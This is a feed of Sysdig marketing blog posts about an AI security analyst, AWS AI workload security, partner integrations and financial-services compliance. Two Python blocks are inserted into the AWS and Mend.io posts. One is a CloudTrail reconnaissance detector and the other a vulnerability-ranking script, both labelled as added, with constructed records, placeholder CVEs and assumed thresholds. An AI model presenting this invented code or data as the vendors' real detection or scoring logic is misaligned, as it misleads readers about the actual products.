Sysdig | Eric Carter
https://sysdig.com/blog/author/eric/
Feed updated: Thu, 01 Aug 2024 16:51:47 +0000

Sysdig Sage™: A groundbreaking AI security analyst
https://sysdig.com/blog/sysdig-sage-a-groundbreaking-ai-security-analyst/
Wed, 31 Jul 2024 13:50:00 +0000

The post Sysdig Sage™: A groundbreaking AI security analyst appeared first on Sysdig.

Generative AI (GenAI) is a top priority for organizations looking to increase productivity and solve business problems faster. In cloud security, AI chatbots to aid security practitioners are becoming more common, but to date, most of these solutions offer only basic queries and summarization. Diverse cloud environments and evolving threats require more from an AI security analyst.

To streamline investigation and help teams understand how to respond to fast-moving cloud attacks, AI for cloud security needs specialized, domain-specific programming, contextual awareness, and the ability for teams to have multi-step conversations that transform data into actionable insights.

Navigating cloud complexity

Cloud ecosystems and technology stacks can be incredibly complex. Navigating the intricacies of public and private clouds, containers, and Kubernetes requires domain expertise. Even seasoned professionals can find it challenging to stay ahead of the latest tech as it relates to cloud threats. For this reason, there is a tangible benefit to having an AI analyst that can instantly deliver the collective wisdom of human experts and the continuous learnings of AI models. 

Responding under pressure

Cloud security teams are under tremendous pressure as they race against the clock. When it’s crunch time, insufficient answers from an AI chatbot, or delays as you search for information aren’t just stressful; they can give adversaries the upper hand. During an investigation or incident response, a lot of time can be wasted trying to determine what something is and how to respond. The proper response for a given scenario may be less obvious to less experienced team members. Getting fast, accurate assistance can make a difference between data and workloads being impacted – or not.

Accelerating human response with a purpose-built AI cloud security analyst

When you have only minutes to respond, the ability to hold a conversation that helps you quickly understand a cybersecurity event and how to address it is extremely powerful. Providing this level of support requires capabilities beyond collecting and compiling data from external sources. By employing multi-step reasoning, contextual awareness, and specialized domain-specific programming, AI for cloud security can offer a more autonomous and comprehensive approach to security analysis.

[Figure: Sysdig Sage, AI-powered cloud security analyst]

This is the approach we’ve taken with Sysdig Sage, Sysdig’s AI cloud security analyst. Sysdig Sage interacts with users through human-like conversations, helping to peel back the layers of security events. 

Architecturally, Sysdig Sage uses a multi-agent approach: multiple specialized AI agents work collaboratively toward a common goal, to simplify and accelerate security and enable a faster, better-informed human response. This architecture uses agent-based reasoning not only to collect data, but also to provide meaningful, context-aware recommendations that are directly useful for security decisions.

Key capabilities of Sysdig Sage

Multi-step reasoning: Sysdig Sage helps security teams peel back the layers of sophisticated cloud threats through in-depth conversations. Start with a simple question and ask follow-up questions to dive deeper, gaining a clearer understanding of runtime events. Straightforward answers and suggested queries enable quick comprehension of security implications and risks in complex cloud estates.

Contextual awareness: Sysdig Sage understands the context of what users are currently observing in the Sysdig UI and provides precise answers based on that context. It helps you navigate the platform UI, directing you to visualizations that provide a deeper understanding of a given event. As a result, team members of all skill levels get the help they need to manage more and escalate less.

Guided response: Beyond summarizing and explaining threats, Sysdig Sage suggests proactive response actions, prevention strategies, and process improvements. It empowers you to take full advantage of the real-time nature of the Sysdig platform, along with insights available from the Sysdig Threat Research team. Considering the speed at which attacks progress in the cloud, fast answers on how to stop threats are key.

Using Sysdig Sage, cloud security teams are equipped to handle complex security tasks:

  • Incident investigation: Analyze incidents to determine root cause, including performed activities, cloud context, and responsible identities.
  • Prioritization: Prioritize threats based on multiple factors, including severity and potential impact.
  • Risk mitigation: Get effective strategies for mitigating identified risks and enhancing security posture and practices.

And, since Sysdig Sage is multilingual – with support for over 80 languages – you can take advantage of its insights in the language of your choice.

Comparing Sysdig Sage with traditional AI assistants

Sysdig Sage is a true AI security analyst. Looking at the landscape of AI assistance currently available, here’s how Sysdig Sage stacks up:

Insight generation vs. data aggregation

  • Traditional AI assistants: Focus on collecting and compiling data from various sources.
  • Sysdig Sage: Goes beyond aggregation to generate actionable insights through advanced agent-based reasoning.

Contextual awareness

  • Traditional AI assistants: Use a separate prompt interface with little or no UI interaction.
  • Sysdig Sage: Aware of the data the user is observing as context for queries; links users to directly relevant UI views.

Decision support vs. information presentation

  • Traditional AI assistants: Present summarized information for review.
  • Sysdig Sage: Provides detailed, step-by-step reasoning to support critical security decisions.

Adaptive problem-solving

  • Traditional AI assistants: Focus on specific use cases (e.g., remediation information).
  • Sysdig Sage: Tackles unforeseen challenges by combining autonomous agents’ specialized skills. Adaptability ensures AI remains effective in the face of evolving security threats.

Enhanced collaboration

  • Traditional AI assistants: Support single tasks.
  • Sysdig Sage: Acts as a true AI security analyst, supporting users in a free-flowing, contextual manner. Facilitates collaboration between human analysts and AI assistance.

Conclusion

As cloud security threats rapidly evolve, so too must capabilities for cloud security. AI capabilities built with multi-step reasoning and contextual awareness give defenders a new way to understand events, reduce escalations, and streamline response. If you’re new to cloud security, having an AI companion to offer insights and advice can help quickly build your skills and aid you in making the right call in the face of threats. And, if you’re a security veteran, finding ways to save time is likely at the top of your list – AI can help. 

Sysdig has designed its cloud security analyst, Sysdig Sage, to function like a team of experts by your side – always available to help you stay ahead of adversaries in an increasingly complex cloud landscape. We invite you to read the next blog in our launch series to learn more and see Sysdig Sage in action.

Webinar: Outpacing Cloud Attackers with GenAI

Join Sysdig CTO, Loris Degioanni, to learn more about advanced AI strategies for rapid threat detection and response.

Securing AI in the Cloud: AI Workload Security for AWS
https://sysdig.com/blog/ai-workload-security-for-aws/
Mon, 10 Jun 2024 13:59:00 +0000

Sysdig extends AI Workload Security to AWS AI services, including Amazon Bedrock, Amazon SageMaker, and Amazon Q.

The post Securing AI in the Cloud: AI Workload Security for AWS appeared first on Sysdig.

To bolster the security of AI workloads in the cloud, Sysdig has extended its recently launched AI Workload Security to AWS AI services, including Amazon Bedrock, Amazon SageMaker, and Amazon Q. This enhancement helps AWS AI service users secure AI workloads and keep pace with the speed of AI evolution.

Sysdig’s AI Workload Security for AWS AI services provides the visibility needed to establish data security measures that combat the risk of exposing trade secrets, proprietary information, and customer data through unauthorized access to AI workloads. If you have uncertainty about the protection and compliance of AI in your organization, read on to learn more about the common risks and what you can now do to establish and maintain the security, confidentiality, and integrity of AI for your business.

The Growing Challenge of AI Security

GenAI presents great potential, but models and the pipelines around them often ingest and retain vast amounts of sensitive training data. Organizations must be prepared for a range of security concerns spanning privacy, cyberattacks, regulatory compliance, and loss of intellectual property.

Threat actors can also use AI to carry out more sophisticated attacks, or target the AI system itself to compromise its integrity. Growing regulation of AI services adds to the pressure: mandates from around the globe require organizations to demonstrate proper governance and supervision of GenAI usage.

AI Workload Security for Amazon Bedrock, Amazon SageMaker, and Amazon Q

AWS AI-related services such as Amazon Bedrock, Amazon SageMaker, and Amazon Q facilitate the development of GenAI-based applications. AWS gives you integration flexibility, letting you choose among industry-leading foundation models (FMs) while relying on built-in enterprise-level security and privacy controls.

  • Amazon Bedrock: A fully managed service that offers foundation models (FMs) from AI companies such as Anthropic, Cohere, Mistral AI, and Amazon for building generative AI applications.
  • Amazon Q: A GenAI-powered assistant that answers questions, provides summaries, generates content, and completes tasks based on customer data and information.
  • Amazon SageMaker: A fully managed service for building, training, and deploying machine learning (ML) models at scale, including access to foundation models.

Organizations are using these AI tools to build and scale tailored generative AI solutions to meet specific use cases and customer needs.

Bridging the AI Security Gap

The pace of security operations must improve to confront AI risks. Many organizations lack the expertise needed to secure AI workloads and identify the associated risks. Just as with any cloud service, it's crucial to prioritize active risks to AI workloads, such as exposed vulnerabilities in production or attempts to manipulate AI requests and responses. Without comprehensive visibility, organizations may find AI doing more harm than good.

Unified Risk Management and Real-Time Insights

Sysdig understands the importance of speed in security response. We created open source Falco for this purpose. By applying automatic discovery with real-time threat detection, we can increase visibility into applications using AI services. Our goal is to help you manage and control AI usage — both legitimate and malicious. Let’s examine a few of the capabilities now available for AWS users who are building with AWS AI services.

Visibility Into AI Risk

Sysdig's unified risk findings feature offers a consolidated view of correlated risks and events. For AI users, this streamlines the workflow for prioritizing, investigating, and mitigating AI risks. Our Cloud Attack Graph integrates Risk Prioritization, Attack Path Analysis, and Inventory to provide a comprehensive view of the details surrounding a particular risk. With the full context of these risks, where they are happening, the corresponding vulnerabilities, and any detected active threats, you can take swift action to mitigate security issues surrounding Bedrock, Q, and SageMaker.

[Figure: AWS AI workload risk]

Checking Your AI Inventory

A key concern for many organizations is simply knowing where AI is being deployed and used. Our inventory feature helps you to identify the resources in your cloud environment that either have AI packages running or that are related, such as storage and IAM policies or roles. This visibility helps you check various aspects of security posture related to AI deployments, such as public exposure.

[Figure: Sysdig AI inventory]


AI Workload Detection and Response

Sysdig’s runtime policy engine enables you to select and apply detection and response rules for your AI workloads. You can apply a range of detections – built on Falco – observing activity using a range of available sources, like syscalls, Kubernetes audit, and AWS CloudTrail. This allows you to identify activity that might put your AI workloads at risk, such as reconnaissance activity attempting to discover and exploit your AI services or data tampering.

When a rule is triggered, Sysdig records and displays all of the context and detail associated with an event. This helps you assess the issue and take further action as needed. Sysdig ships with dozens of managed policies, which our Threat Research and engineering teams frequently update to help stay on top of known adversarial tactics.
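
The CloudTrail-sourced detections described above are Sysdig managed policies, and the post does not show their rule logic. What follows is an added example, not Sysdig's or Falco's code, of the kind of logic such a rule implements: it runs over a handful of constructed CloudTrail records and flags one principal that enumerates Bedrock and SageMaker APIs in a short window and then collects repeated AccessDenied errors, the reconnaissance pattern the paragraph mentions. The principals, source IPs, thresholds, window size, and event timings are all assumptions made for the example; the eventName and eventSource strings are the standard CloudTrail ones.

```python
"""Added illustration of a CloudTrail-based reconnaissance detection for AWS AI
services.  Not a Sysdig or Falco rule: the records, principals, IPs and
thresholds below are constructed for the example."""
from collections import defaultdict
from datetime import datetime, timezone

# CloudTrail eventSource values for the AWS AI services named in the post
AI_SOURCES = {"bedrock.amazonaws.com", "sagemaker.amazonaws.com", "qbusiness.amazonaws.com"}
ENUM_PREFIXES = ("List", "Describe", "Get")  # read-only discovery calls
WINDOW_SECONDS = 300          # assumed sliding window
DISTINCT_ENUM_THRESHOLD = 4   # assumed: distinct discovery APIs per principal per window
DENIED_THRESHOLD = 3          # assumed: AccessDenied errors per principal per window


def parse_time(ts):
    """CloudTrail eventTime is ISO-8601 UTC with a trailing Z."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def detect_ai_recon(events):
    """Return one finding per (principal, pattern) seen in any WINDOW_SECONDS window.

    Patterns: 'ai_api_enumeration' (many distinct List/Get/Describe calls to AI
    services) and 'ai_access_denied_burst' (repeated AccessDenied against them)."""
    by_principal = defaultdict(list)
    for ev in events:
        if ev.get("eventSource") in AI_SOURCES:
            by_principal[ev["userIdentity"]["arn"]].append(ev)

    findings, reported = [], set()
    for arn, evs in by_principal.items():
        evs.sort(key=lambda e: parse_time(e["eventTime"]))
        start = 0
        for end, last in enumerate(evs):
            t_end = parse_time(last["eventTime"])
            # slide the window start forward until the window fits WINDOW_SECONDS
            while (t_end - parse_time(evs[start]["eventTime"])).total_seconds() > WINDOW_SECONDS:
                start += 1
            window = evs[start:end + 1]
            enum_names = sorted({e["eventName"] for e in window
                                 if e["eventName"].startswith(ENUM_PREFIXES)})
            denied = [e["eventName"] for e in window if e.get("errorCode") == "AccessDenied"]
            checks = (
                ("ai_api_enumeration", len(enum_names) >= DISTINCT_ENUM_THRESHOLD, enum_names),
                ("ai_access_denied_burst", len(denied) >= DENIED_THRESHOLD, denied),
            )
            for kind, hit, evidence in checks:
                if hit and (arn, kind) not in reported:
                    reported.add((arn, kind))
                    findings.append({"principal": arn, "kind": kind,
                                     "at": last["eventTime"], "evidence": evidence,
                                     "sourceIPAddress": last.get("sourceIPAddress")})
    return findings


def _ev(time, arn, name, source="bedrock.amazonaws.com", error=None, ip="203.0.113.10"):
    """Build a minimal CloudTrail record (constructed; only the fields used above)."""
    ev = {"eventTime": time, "eventSource": source, "eventName": name,
          "awsRegion": "us-east-1", "sourceIPAddress": ip, "userIdentity": {"arn": arn}}
    if error:
        ev["errorCode"] = error
    return ev


# Constructed principals: a CI credential behaving oddly, and a normal app role
RECON = "arn:aws:iam::111122223333:user/ci-runner"
APP = "arn:aws:sts::111122223333:assumed-role/app-backend/i-0abc123"

SAMPLE_EVENTS = [
    _ev("2024-06-10T14:00:05Z", RECON, "ListFoundationModels"),
    _ev("2024-06-10T14:00:09Z", RECON, "ListCustomModels"),
    _ev("2024-06-10T14:00:14Z", RECON, "GetFoundationModel"),
    _ev("2024-06-10T14:00:20Z", RECON, "ListGuardrails"),
    _ev("2024-06-10T14:00:31Z", RECON, "InvokeModel", error="AccessDenied"),
    _ev("2024-06-10T14:00:33Z", RECON, "InvokeModel", error="AccessDenied"),
    _ev("2024-06-10T14:00:40Z", RECON, "ListNotebookInstances", source="sagemaker.amazonaws.com"),
    _ev("2024-06-10T14:00:42Z", RECON, "InvokeModel", error="AccessDenied"),
    _ev("2024-06-10T14:01:00Z", APP, "InvokeModel", ip="10.0.4.21"),
    _ev("2024-06-10T14:03:00Z", APP, "InvokeModel", ip="10.0.4.21"),
    _ev("2024-06-10T14:05:00Z", APP, "ListBuckets", source="s3.amazonaws.com"),  # not an AI service
]

if __name__ == "__main__":
    for f in detect_ai_recon(SAMPLE_EVENTS):
        print(f"{f['at']} {f['kind']} {f['principal']} evidence={f['evidence']}")
```

Running it reports two findings for the ci-runner principal and none for the application role, whose routine InvokeModel calls never trip either threshold. In a real deployment the same logic would key on whatever identity field your log pipeline normalizes and would tune the window and thresholds per account; the point is that both signals come straight from CloudTrail fields, without touching the workload.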

[Figure: AI CDR rules library]

Preparing for the Future of AI Security

Understanding and managing AI risks is crucial as organizations race to integrate AI into their software. Together with AWS, Sysdig is enabling customers to securely harness the efficiency and speed that AI offers. AWS provides the key building blocks with services like Bedrock, Q, and SageMaker, while real-time AI Workload Security from Sysdig helps organizations capitalize on the benefits of AI with confidence.

AWS and Sysdig are ready to help organizations be better equipped to safeguard AI innovation. Extending Sysdig’s CNAPP solution to AWS AI services provides an additional layer of security to meet the growing demands for AI-related business solutions.

Watch our webinar, How to Safeguard GenAI Workloads in Exposed Environments, to hear more about how Sysdig helps secure your AI workloads.

Accelerating AppSec with Mend.io and Sysdig
https://sysdig.com/blog/accelerating-appsec-with-mend-io-and-sysdig/
Tue, 07 May 2024 14:01:09 +0000

Sysdig and Mend.io help developers, DevOps, and security teams accelerate secure software delivery from development to deployment.

The post Accelerating AppSec with Mend.io and Sysdig appeared first on Sysdig.

Today at RSA Conference 2024, Mend.io and Sysdig unveiled a joint solution targeted at helping developers, DevOps, and security teams accelerate secure software delivery from development to deployment. The integration incorporates the exchange of runtime insights and application ownership context between Sysdig Secure and Mend Container to provide users with superior, end-to-end, and risk-based vulnerability prioritization and remediation across development and production environments.

As organizations increase the use of cloud-native services like containers and Kubernetes, they struggle to keep up with the high number of detected security issues. Together, Mend.io and Sysdig give organizations struggling with limited time and resources more effective ways to target the remediation of real risk. By providing insights into risk detected at runtime, security teams can prevent and defend with greater confidence.

The Growing Challenge of Securing Workloads

Gartner predicts that by 2025, 45% of large enterprises will have experienced attacks on their software supply chains. Threat actors are constantly looking for ways to introduce and exploit vulnerabilities to infiltrate a target organization’s network. As containers continue to grow in usage, they become an ideal delivery vehicle for malicious code.

The volume of newly discovered vulnerabilities continues to increase every year. In fact, the total number of Common Vulnerabilities and Exposures (CVEs) is predicted to increase by 25% in 2024. The never-ending flow of new vulnerabilities overwhelms developers and security teams alike. These teams need better ways to filter through the noise and achieve their ultimate goal of delivering software innovation, securely.

Taming Application Security with Mend.io and Sysdig

Sysdig and Mend.io have come together to address the frustration of chasing endless software vulnerabilities.

  • Mend.io has over a decade of experience helping global organizations build world-class AppSec programs. Mend Container identifies and prioritizes critical security vulnerabilities, providing actionable remediation suggestions and a full picture of your open source libraries and dependencies.
  • Sysdig brings a deep understanding of what’s happening at runtime. As the creator of Falco open source, Sysdig is a pioneer in real-time visibility into abnormal behavior, potential security threats, and compliance violations with its comprehensive runtime security.

Through its vantage point at runtime, Sysdig profiles containers to pinpoint the software packages that are in use vs. those that are not. Armed with these insights, Mend.io enables developers to quickly target the remediation of vulnerabilities and real risk based on severity, exploitability, reachability, and runtime exposure.

How it Works: Mend.io and Sysdig Integration

Mend Container, when integrated with both Mend SCA and the Sysdig Runtime Insights API, incorporates the runtime context of software packages into Mend SCA and container scanning results. With a view into runtime context, developers and security teams can confirm application deployment and behavior in production and set their preferred remediation priorities and scoring.

[Figure: Mend and Sysdig integration]

Mend.io goes beyond CVSS scores to help teams calculate risk. By analyzing aspects such as reachability and exploitability – and now runtime usage – it allows you to move beyond theoretical risk to understand the risk in the context of your application specifically.
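
As an added illustration, and not Mend.io's or Sysdig's actual scoring, the following reranks a constructed set of image-scan findings using the two signals the paragraphs above describe: whether a package was actually loaded by a running container, and whether an exploit is known. The package names, the placeholder CVE identifiers (deliberately not real ones), the runtime profile, and the weights are all assumptions made for the example. What it shows is the effect the post describes: a critical finding in a package nothing executes drops below two high findings in packages that are in use.

```python
"""Added illustration of runtime-aware vulnerability prioritization.  Not
Mend.io's or Sysdig's scoring; package names, placeholder CVE identifiers,
the runtime profile and the weights are constructed for the example."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    package: str
    cve: str             # placeholder identifiers, deliberately not real CVEs
    cvss: float
    exploit_known: bool  # public exploit / known-exploited, as an SCA tool would flag
    fix_available: bool


# Constructed scan results for a hypothetical container image
SCAN = [
    Finding("imagemagick", "CVE-EXAMPLE-0001", 9.8, True, True),    # critical, never executed
    Finding("openssl", "CVE-EXAMPLE-0002", 7.5, True, True),        # high, in use, exploit known
    Finding("libxml2", "CVE-EXAMPLE-0003", 8.1, False, True),       # high, in use, no exploit
    Finding("python3-pip", "CVE-EXAMPLE-0004", 5.3, False, False),  # medium, build-time only
    Finding("zlib", "CVE-EXAMPLE-0005", 4.0, False, True),          # medium, in use
]

# Constructed runtime profile: packages whose files running processes actually
# loaded, which is what a runtime agent observes; everything else is dormant
IN_USE = {"openssl", "libxml2", "zlib"}

IN_USE_WEIGHT = 1.0    # assumed: full weight when the package executes at runtime
DORMANT_WEIGHT = 0.3   # assumed: heavy discount when nothing loads it
EXPLOIT_BONUS = 2.0    # assumed: flat bump for a known exploit


def risk_score(f, in_use):
    """CVSS scaled by runtime exposure, plus a bump when an exploit is known."""
    weight = IN_USE_WEIGHT if f.package in in_use else DORMANT_WEIGHT
    return round(f.cvss * weight + (EXPLOIT_BONUS if f.exploit_known else 0.0), 2)


def tier(f, in_use):
    """Map a finding to a remediation bucket a team can act on."""
    if f.package in in_use and f.exploit_known:
        return "fix-now"
    if f.package in in_use and f.cvss >= 7.0:
        return "next-sprint"
    if f.package not in in_use and not f.fix_available:
        return "accept-and-track"
    return "backlog"


def cvss_order(findings):
    """Baseline: what a scanner alone would hand a developer, highest CVSS first."""
    return [f.cve for f in sorted(findings, key=lambda f: (-f.cvss, f.cve))]


def prioritize(findings, in_use):
    """Runtime-aware ranking: (cve, package, score, tier), highest risk first."""
    ranked = sorted(findings, key=lambda f: (-risk_score(f, in_use), f.cve))
    return [(f.cve, f.package, risk_score(f, in_use), tier(f, in_use)) for f in ranked]


def dormant_fraction(findings, in_use):
    """Share of findings that are not in use: deferrable rather than ignorable."""
    return sum(1 for f in findings if f.package not in in_use) / len(findings)


if __name__ == "__main__":
    print("CVSS only :", cvss_order(SCAN))
    for row in prioritize(SCAN, IN_USE):
        print("runtime   :", row)
    print(f"dormant   : {dormant_fraction(SCAN, IN_USE):.0%}")
```

The CVSS-only order starts with the dormant imagemagick finding; the runtime-aware order starts with the in-use openssl finding that also has a known exploit, and the dormant critical lands third with a "backlog" tier. The dormant findings are not discarded, only deferred, which matters because a package that is unused today can be exercised by the next deploy.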

[Figure: Mend.io UI showing runtime insights]

Additionally, Mend Container is able to provide ownership insights for applications that help security teams identify associated repos and application ownership for vulnerable packages. These insights enable automation and acceleration of the remediation process across teams.

Secure from Code to Cloud

With potential threats taking many forms across the software life cycle, both pre- and post-production, organizations need a way to protect applications from multiple forms of risk. Together, Mend.io and Sysdig help users leverage both “Shift Left” and “Shield Right” security strategies.

Even the best AppSec program alone is not enough as it is impossible to guard against every unknown threat that may arise in production. Here, Sysdig’s runtime security plays a key role in detecting threats in real-time across your containers and cloud. “Shield Right” focuses on operational practices to prevent security incidents, as well as security monitoring and behavioral analysis to detect and respond to events when they occur.

With Sysdig and Mend.io, security teams can both harden their security posture to prevent attacks before they happen and continuously monitor for active risk to keep cloud environments and applications safe.

Build a World-Class Security Program with Mend.io and Sysdig

As organizations accelerate delivery of cloud applications, ensuring end-to-end security across the software supply chain and into production is key to success. We are confident that joint customers of Mend.io and Sysdig will be able to expedite responsiveness, streamline vulnerability remediation, and drive a highly efficient and automated security workflow. The AppSec expertise of Mend.io and cloud-native application protection from Sysdig empower developer and security teams to move faster and focus on innovation.

Visit our Mend.io integration page for access to additional resources and to learn more about our joint solution.

Strengthening Cloud Security Together: Meet the Runtime Insights Partner Ecosystem
https://sysdig.com/blog/meet-the-runtime-insights-partner-ecosystem/
Thu, 02 May 2024 13:45:00 +0000

The post Strengthening Cloud Security Together: Meet the Runtime Insights Partner Ecosystem appeared first on Sysdig.

In the ever-evolving landscape of cloud security, staying ahead of threats is paramount. Success requires well-orchestrated cybersecurity solutions that work together from prevention to defense. Today we launched our latest initiative, the Runtime Insights Partner Ecosystem, which brings together leading solutions that strengthen cloud security through integration and collaboration.

Centered around sharing valuable insights that accelerate and simplify vulnerability management, posture management, and cloud detection & response, the Runtime Insights Partner Ecosystem helps cloud users better prioritize risk, automate workflows, ensure compliance, and respond at cloud speed. We’re thrilled to be supported by a roster of partners representing a wide spectrum of leading industry solutions.

Read on to learn more about the unique collaborations that equip cloud teams to bolster cloud security.

Collaborating to solve cloud security challenges

Cloud security is a multifaceted challenge. Cloud attacks happen fast, and their speed and sophistication mean that security teams and tools must be able to move faster than an attacker. There is also no such thing as a one-size-fits-all solution: successful cloud security programs require a breadth of coverage to protect against known and unknown threats.

Over time, to meet the needs of distinct teams and particular use cases, you’ve likely rolled out a wide range of tooling across cloud security domains from Identity and AppSec to Threat Detection and Incident Response. Wouldn’t it be great to have connective tissue across these domains to share insights so you can move faster and optimize outcomes? This is the goal of our integration ecosystem.

The core of our collaboration: Runtime Insights

At Sysdig, our cloud security platform is designed with runtime visibility at its core. Built on Falco open source, our deep real-time understanding of what's happening at runtime not only helps users pinpoint advanced threats but also delivers intel that adds value across many cloud security domains. This intel, what we call runtime insights, provides meaningful runtime context that can enrich solutions from other providers in the ecosystem. Here are a few examples:

  • Vulnerability prioritization: AppSec solutions identify and prioritize in-use vulnerable packages in your running workloads.
  • Active threat detection & response: Incident response solutions incorporate threat events and context for analysis and response automation.
  • Permission management: Identity solutions get visibility into inactive users and excessive permissions to enforce least-privilege access.
  • Posture drift control: Infrastructure-as-code (IaC) and GitOps tools gain visibility into deployment inconsistencies to automate required remediations.

[Figure: Sysdig runtime insights]

Runtime Insights Ecosystem Partner solution highlights

Our partners bring expertise across domains like AppSec, next-gen SIEM and SOAR, XDR, IT Service Management, and more. When combined with Sysdig, these partners give users an added advantage in defending against cloud threats, from shift left to shield right.

Here is a sample of the integrations we deliver together with key partners.

  • Checkmarx – Checkmarx One uses runtime insights to prioritize vulnerabilities associated with running container packages that pose the most risk.
  • Cybereason – With runtime insights, Cybereason XDR enables teams to manage cloud risk with XDR context from the broader enterprise.
  • Docker Scout – Docker Scout uses runtime insights to identify active images and packages to spotlight risk and help secure your software supply chain.
  • Elastic – With Elasticsearch, Elastic helps practitioners accelerate investigation and response using runtime insights from the Sysdig CNAPP platform.
  • Google Chronicle – Chronicle enables Sysdig users to extract more value from insights collected from cloud workloads in runtime environments.
  • Mend.io – Mend Container leverages runtime insights to provide users with end-to-end, risk-based vulnerability prioritization and remediation.
  • Netskope – Sysdig and Netskope correlate cloud threat insights across users and workloads to deliver high-fidelity protection for users, apps, and data.
  • PagerDuty – With Sysdig and PagerDuty, teams more effectively detect and respond to threats and anomalies across containers, Kubernetes, and cloud.
  • ServiceNow – ServiceNow Container Vulnerability Response (CVR) incorporates Sysdig-detected vulnerabilities and in-use insights to enable faster assignment, triage, and response.
  • Snyk – Snyk and Sysdig deliver feedback and visibility from production back to developers, eliminating the noise of container vulnerabilities.
  • Sumo Logic – Sumo Logic enables Sysdig users to accelerate cloud insights into action with its cloud SIEM and SOAR capabilities.
  • Tines – Tines taps into the Sysdig API with its smart, secure workflow builder to enable intelligent automation for swift response to cloud security threat events.

For an additional view into all of the cloud and tech partner integrations available, visit sysdig.com/integrations.

A two-way street: Partner data makes Sysdig better

Our partnerships aren't just about the cloud security insights available from Sysdig. Many of our partners provide critical data sources that enable Sysdig to detect threats across multiple domains and provide critical cloud security insights. Here are a few examples:

  • Cloud logs: AWS CloudTrail, Google Cloud Audit Logs, and Azure Platform Logs provide insight into cloud account and service activity.
  • Identity logs: Logs from solutions like Okta and Microsoft Entra enable the detection of anomalous events to protect against identity attacks.
  • GitHub logs: GitHub event data enables Sysdig to detect risks to GitHub repos such as leaked secrets, exfiltration of sensitive data, and cryptomining through GitHub Actions.

[Figure: Sysdig data sources]

Driving better cloud security outcomes together

The launch of the Runtime Insights Partner Ecosystem marks a step forward in cloud security, harnessing the power of leading solutions across the industry along with runtime insights from Sysdig. Our goal is to empower organizations to stay ahead of threats and effectively safeguard cloud environments.

What's next? Visit our Runtime Insights Ecosystem page to learn more about our work with solution partners.

How Financial Services Organizations Can Stay Compliant – Without Sacrificing Security
https://sysdig.com/blog/financial-services-organizations-secure-compliance/
Tue, 16 Jan 2024 17:30:00 +0000

The post How Financial Services Organizations Can Stay Compliant – Without Sacrificing Security appeared first on Sysdig.

The stakes couldn't be higher for financial services organizations. They have to protect customers' money and privacy while complying with technical requirements and governmental regulations. Complying with all those requirements poses a major, ongoing challenge for security teams, which are already under pressure to do more with less.

Cybercrime continues to grow, with every industry falling victim at one time or another. Not surprisingly, financial organizations have presented an especially appealing target. Ransomware attacks alone affected 74% of global financial institutions in 2021–2022, and the average cost of a data breach in the sector hit $5.72 million.

Financial details are highly prized and offer even inexperienced hackers an opportunity to make a quick buck: credit card numbers, for instance, can be easily sold for $30 each.

Increasingly, attackers are exploiting weaknesses in cloud security architectures to grab such valuable information, with Sysdig's latest research finding that 65% of cloud attacks now target financial services companies and telcos. An insecure configuration lurking deep within a cloud stack can wreak havoc once an attacker finds and exploits it.

At the same time, financial services organizations must stay compliant with constantly changing cybersecurity standards and governmental regulations. As cloud migration in the sector grows, security leaders face a balancing act. How do you deal with complex cloud security and compliance challenges without slowing down the development of products that deliver growth?

Staying compliant with evolving regulations

Managing compliance is becoming increasingly difficult for financial services organizations. They must keep track of more standards and regulations than ever: some optional, some compulsory, some that vary by region, and many that overlap. There are technical standards like those from NIST and ISO, data security standards like PCI DSS, governmental regulations like GDPR and GLBA, and attestation frameworks like SOC 2. It's a virtual alphabet soup of rules and regulations.

To meet these standards and regulations, financial services organizations need to have the proper controls, testing, and reporting abilities in place. If they don't, they face loss of reputation and hefty fines; global financial services regulators imposed more than $7 billion in fines in 2022. Ouch.

And of course, financial services organizations must still consider security requirements. Banking is one of the most regulated industries in the world, and banks must adopt security built for cloud-native environments to guard against evolving threats and reduce risk. The ability to prioritize vulnerabilities, detect threats in real time, identify misconfigurations, audit activity, and measure compliance with regulations is critical for banks to realize the full benefits of the cloud.

    Meeting the compliance challenge

    To fully take advantage of the agility and speed the cloud offers, financial services organizations need a robust cloud-centric security architecture and tooling to improve visibility and control. To balance uptime with fast time-to-market, developers need tools and security platforms that work together –built on open standards so that they can be customized to compliance. Reducing the burden of alert fatigue helps developers spend less time fixing vulnerabilities, and more time developing secure products.

    A series of point solutions that need to be painstakingly integrated can’t handle the compliance and security requirements of such a heavily regulated industry. They provide too many opportunities for vital alerts to be missed and too many possible opportunities for breaches.

    The answer is a cloud-native application protection platform (CNAPP). A CNAPP can give you dramatically better visibility and control over your whole cloud-native application stack. A CNAPP provides a feedback loop that enables true end-to-end coverage of the cloud-native application lifecycle.

    With a CNAPP, you get comprehensive coverage for security and compliance purposes. A CNAPP solution reveals interrelationships between the insights of various security points-of-view and across use cases to promote collaboration between DevSecOps, DevOps, and cloud security operations teams. It can be the equalizer when it comes to providing real-time knowledge of your cloud environment and incorporating common workflows, data correlations, meaningful insights, and remediation.

    By adopting a CNAPP, you can achieve a higher level of security across all major aspects of your cloud infrastructure and cloud-native application stack. And by embedding CNAPP security from the earliest stages of the development process all the way into production, you can ensure that what is delivered will maintain the highest levels of security and compliance integrity.

    How Sysdig can help

    Sysdig helps financial services organizations secure and accelerate innovation in the cloud. Sysdig delivers cloud and container security that provides FinServ organizations with a single view of risk, so they can prioritize risk and remediate issues at their source, ensuring both compliance and security. With Sysdig, banks can leverage cloud services to stay competitive without risking exposure to cyber threats.

    Sysdig delivers cloud and container security, so financial services organizations moving to the cloud, or already operating in the cloud, can effectively manage their security posture and stop attacks with no wasted time.

    • Cloud detection and response: Thanks to multilayered threat detection that combines Falco-based policies and Machine Learning (ML) detections, financial services organizations can respond to threats targeting workloads, cloud services, and identities more easily and confidently.
    • Compliance and posture management: With Sysdig, financial services organizations get built-in compliance tools to assess their security posture. Teams can easily identify and fix misconfigurations and ensure they follow best practices.
    • Vulnerability management: Financial services firms get everything they need to identify and prioritize vulnerabilities, based on in-use risk exposure. By addressing real risk, they can accelerate the time to achieve security and compliance.
    • Entitlement management: Sysdig helps financial services organizations gain visibility into cloud identities and manage permissions to eliminate excess permissions and enforce least privilege. 

    The cloud has fundamentally changed the anatomy and nature of modern applications, IT infrastructures, and related processes. Financial services organizations are successfully taking advantage of the cloud to achieve new levels of agility. Key to this success is ensuring that firms can meet compliance and security requirements to deliver innovation while minimizing risk at cloud speed. The Sysdig CNAPP platform helps banks investing in cloud and cloud-native applications provide the protections needed to ensure compliance, and prevent, detect, and stop cloud threats.

    Ready to take the next step for your organization’s compliance? Learn how Sysdig can help you.

